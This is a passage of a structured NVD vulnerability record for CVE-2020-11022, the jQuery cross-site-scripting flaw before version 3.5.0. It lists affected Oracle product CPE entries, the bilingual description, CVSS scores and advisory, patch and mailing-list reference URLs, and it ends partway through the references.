"AD080793-FC45-4260-8E45-40E228F432FC", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "2ACA29E6-F393-46E5-B2B3-9158077819A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "FCD1EC13-CC2F-4668-90D2-D8609066F2DF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "4D614F76-0AA1-4EA8-A24A-38EFC90EF5DB", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "39B8DFFF-B037-4F29-8C8E-F4BBC3435199", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "4D0D0EAC-300D-44B1-AD4A-93A368D5DBA1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:*", matchCriteriaId: "C5E0646D-4866-41FB-AE2E-5307B6F4004A", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "8A566893-8DCF-49E4-93D0-0ACCEFD70D3D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:*", matchCriteriaId: "B37FC113-4F40-4D29-8712-7AD250373008", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "00E5D719-249D-48B8-BAFC-1E14D250B3F6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "712577A9-04D6-4579-A82B-72200E467399", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:*", matchCriteriaId: "672949B4-1989-4AA7-806F-EEC07D07F317", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "987A0C35-4C7F-4FFB-B47B-37B69A32F879", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: 
"8B3B6BE3-4C5A-402F-832C-86A0A6234C25", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "9476D1DA-C8A8-40A0-94DD-9B46C05FD461", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "34070F24-2E53-43EC-9117-E1434B2C4C2B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "B9B2C2F6-235F-4E78-A299-18C041C05C9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F727AAC6-6D9F-4B28-B07C-6A93916C43A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*", matchCriteriaId: "6662C783-5B5C-4559-89F5-1A681AA46A3E", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "51C17460-D326-4525-A7D1-0AED53E75E18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "37C8EE84-A840-4132-B331-C7D450B1FBBF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "1D8436A2-9CA3-4C91-B632-9B03368ABC1B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "6149C89E-0111-4CF9-90CA-0662D2F75E04", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "6CDDF6CA-6441-4606-9D2F-22A67BA46978", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "6FA0B592-A216-4320-A4FE-ABCA6B3E7D7A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "CEA4D6CF-D54A-40DF-9B70-E13392D0BE19", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*", matchCriteriaId: "2A333755-4B6E-4A0F-AC48-4CEA70CD5801", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "397B1A24-7C95-4A73-8363-4529A7F6CFCC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "D262848E-AA24-4057-A747-6221BA22ADF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "4A01F8ED-64DA-43BC-9C02-488010BCD0F4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "75638A6A-88B2-4BC7-84EA-1CF5FC30D555", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "501B9331-6BB7-44BF-A664-180CAFABF88C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7:*:*:*:*:*:*:*", 
matchCriteriaId: "F2A3AE3C-8E24-4FB6-9954-9B50CBD59B21", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F8E565DA-91BE-44FC-A28F-579BE8D2281A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:*:*:*:*:*:*:*:*", matchCriteriaId: "AED72F90-3B68-45AC-865C-110F7FD30D37", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:*", matchCriteriaId: "4F909C61-1A74-402C-B74F-BAF7297875B0", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:*", matchCriteriaId: "26A1F27B-C3AC-4D13-B9B2-2D6CF65D07BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "B95E8056-51D8-4390-ADE3-661B7AE1D7CE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.1:*:*:*:*:*:*:*", matchCriteriaId: "609D6EDF-D4D0-4370-9B8B-CA39D41946C0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9059A907-508B-4844-8D7B-0FA68C0DF6A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", matchCriteriaId: "2AC63D10-2326-4542-B345-31D45B9A7408", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:*", matchCriteriaId: "1F7BF047-03C5-4A60-B718-E222B16DBF41", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:*", matchCriteriaId: "E3A73D81-3E1A-42E6-AB96-835CDD5905F2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:19.1.0-19.1.2:*:*:*:*:*:*:*", matchCriteriaId: "351F9DE9-2FCE-4BCA-A098-CDFB07E6E4B9", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:*", matchCriteriaId: "66136D6D-FC52-40DB-B7B6-BA8B7758CE16", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "06514F46-544B-4404-B45C-C9584EBC3131", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "3BD4BF9A-BF38-460D-974D-5B3255AAF946", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_data_foundation:8.0.6-8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "D10745C6-2751-4FD0-BDFA-84C7AB8066BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*", matchCriteriaId: "B47C73D0-BE89-4D87-8765-12C507F13AFF", versionEndIncluding: "5.6.0.0", versionStartIncluding: "5.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5B8AA91A-1880-43CD-938D-48EF58ACF2CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "D0A735B4-4F3C-416B-8C08-9CB21BAD2889", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: 
"D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:*", matchCriteriaId: "15512D27-7BEB-4DDD-9A1B-447FC7156E3D", versionEndIncluding: "12.2.20", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", matchCriteriaId: "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:*", matchCriteriaId: "90F0B2AB-453C-4585-8753-74D17BD20C79", versionEndIncluding: "12.2.20", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", matchCriteriaId: "31C7EEA3-AA72-48DA-A112-2923DBB37773", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "F0735989-13BD-40B3-B954-AC0529C5B53D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFAEA84-E376-40A2-8C9F-3E0676FEC527", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", matchCriteriaId: "959316A8-C3AF-4126-A242-3835ED0AD1E8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", matchCriteriaId: "BDB925C6-2CBC-4D88-B9EA-F246F4F7A206", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:*", matchCriteriaId: "98B9198C-11DF-4E80-ACFC-DC719CED8C7E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40B13B7-68B3-4510-968C-6A730EB46462", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "C93CC705-1F8C-4870-99E6-14BF264C3811", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: 
"F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.", }, { lang: "es", value: "En las versiones de jQuery mayores o iguales a 1.2 y anteriores a la versión 3.5.0, pasar HTML desde fuentes no seguras, incluso después de desinfectarlo, a uno de los métodos de manipulación DOM de jQuery (es decir, .html(), .append() y otros) 
puede ejecutar código no seguro. Este problema está corregido en jQuery 3.5.0.", }, ], id: "CVE-2020-11022", lastModified: "2024-11-21T04:56:36.110", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.9, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N", version: "3.1", }, exploitabilityScore: 1.6, impactScore: 4.7, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 2.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2020-04-29T22:15:11.903", references: [ { source: "security-advisories@github.com", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { source: "security-advisories@github.com", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { source: "security-advisories@github.com", tags: [ "Broken 
Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { source: "security-advisories@github.com", tags: [ "Exploit", "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html", }, { source: "security-advisories@github.com", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { source: "security-advisories@github.com", tags: [ "Mitigation", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2", }, { source: "security-advisories@github.com", tags: [ "Mitigation", "Vendor Advisory", ], url: "https://jquery.com/upgrade-guide/3.5/", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: 
"https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3Ccommits.airflow.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E", }, { source: "security-advisories@github.com", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { source: "security-advisories@github.com", url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/", }, { source: "security-advisories@github.com", url: 
"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/", }, { source: "security-advisories@github.com", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://security.gentoo.org/glsa/202007-03", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2020/dsa-4693", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.drupal.org/sa-core-2020-002", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "security-advisories@github.com", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: 
"https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-10", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-11", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2021-02", }, { source: "security-advisories@github.com", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2021-10", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Broken Link", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Exploit", "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/162159/jQuery-1.2-Cross-Site-Scripting.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mitigation", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/security/advisories/GHSA-gxr4-xjj5-5px2", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mitigation", "Vendor Advisory", ], url: "https://jquery.com/upgrade-guide/3.5/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.gentoo.org/glsa/202007-03", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: 
